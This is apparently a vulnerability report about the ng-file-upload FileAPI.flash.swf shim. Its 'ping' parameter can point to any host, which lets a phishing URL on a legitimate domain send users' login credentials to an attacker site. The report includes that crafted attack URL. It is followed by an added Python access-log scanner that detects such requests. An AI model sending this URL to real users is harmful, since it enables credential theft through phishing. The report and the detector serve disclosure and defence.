This file is vulnerable to an attack, where the attacker can send the victim to this URL:
https://my.website.com/**/**/**/**/ng-file-upload-shim/FileAPI.flash.swf?ping=//authorization.site
And that will prompt the user to enter their login details, but the login details are actually being sent to the attacker's website (authorization.site) instead of my website.
Firefox warns the user that the data will be sent to another site.
Safari will prompt for the credentials with the message:
Because it can be used by an unauthenticated attacker to attack any legitimate user, and since the URL the victim sees is the one for the legitimate use case, it might be easier to phish.
https://**my.website.com**/##/##/##/##/ng-file-upload-shim/FileAPI.flash.swf?ping=//authorization.site
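A detection check for the request pattern described in the report, as an added example that is not part of the original report or of the ng-file-upload project: it scans web-server access-log lines for requests to `FileAPI.flash.swf` whose `ping` parameter names a host other than the site's own. The log lines, the `/static/` path prefix, and the names `SITE_HOST`, `external_ping_host` and `flag_lines` are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "my.website.com"  # assumption: the legitimate host, as named in the report

# Constructed access-log lines (not from the report); the /static/ prefix is made up.
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /static/ng-file-upload-shim/FileAPI.flash.swf HTTP/1.1" 200 6512',
    '198.51.100.5 - - [01/Jan/2024:10:00:05 +0000] "GET /static/ng-file-upload-shim/FileAPI.flash.swf?ping=//authorization.site HTTP/1.1" 200 6512',
    '198.51.100.6 - - [01/Jan/2024:10:00:09 +0000] "GET /static/ng-file-upload-shim/FileAPI.flash.swf?ping=%2F%2Fauthorization.site HTTP/1.1" 200 6512',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /static/ng-file-upload-shim/FileAPI.flash.swf?ping=/health HTTP/1.1" 200 6512',
    '198.51.100.8 - - [01/Jan/2024:10:00:15 +0000] "GET /static/ng-file-upload-shim/FileAPI.flash.swf?ping=https://my.website.com/health HTTP/1.1" 200 6512',
]

# Pulls the request target out of a combined-log-format request field.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def external_ping_host(target, site_host=SITE_HOST):
    """Return the off-site host named by a ping parameter on the SWF, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/fileapi.flash.swf"):
        return None
    # parse_qs percent-decodes values, so ping=%2F%2Fhost is seen as //host.
    for key, values in parse_qs(parts.query).items():
        if key.lower() != "ping":
            continue
        for value in values:
            try:
                # Backslashes are treated like slashes so \\host is not missed.
                host = urlsplit(value.replace("\\", "/")).hostname
            except ValueError:
                return value  # unparseable target: report it raw for review
            if host and host.lower() != site_host:
                return host.lower()
    return None


def flag_lines(lines):
    """Return (host, line) for every log line with an off-site ping target."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        host = external_ping_host(match.group(1)) if match else None
        if host:
            hits.append((host, line))
    return hits


if __name__ == "__main__":
    for host, line in flag_lines(SAMPLE_LOG):
        print(f"ping -> {host}: {line}")
```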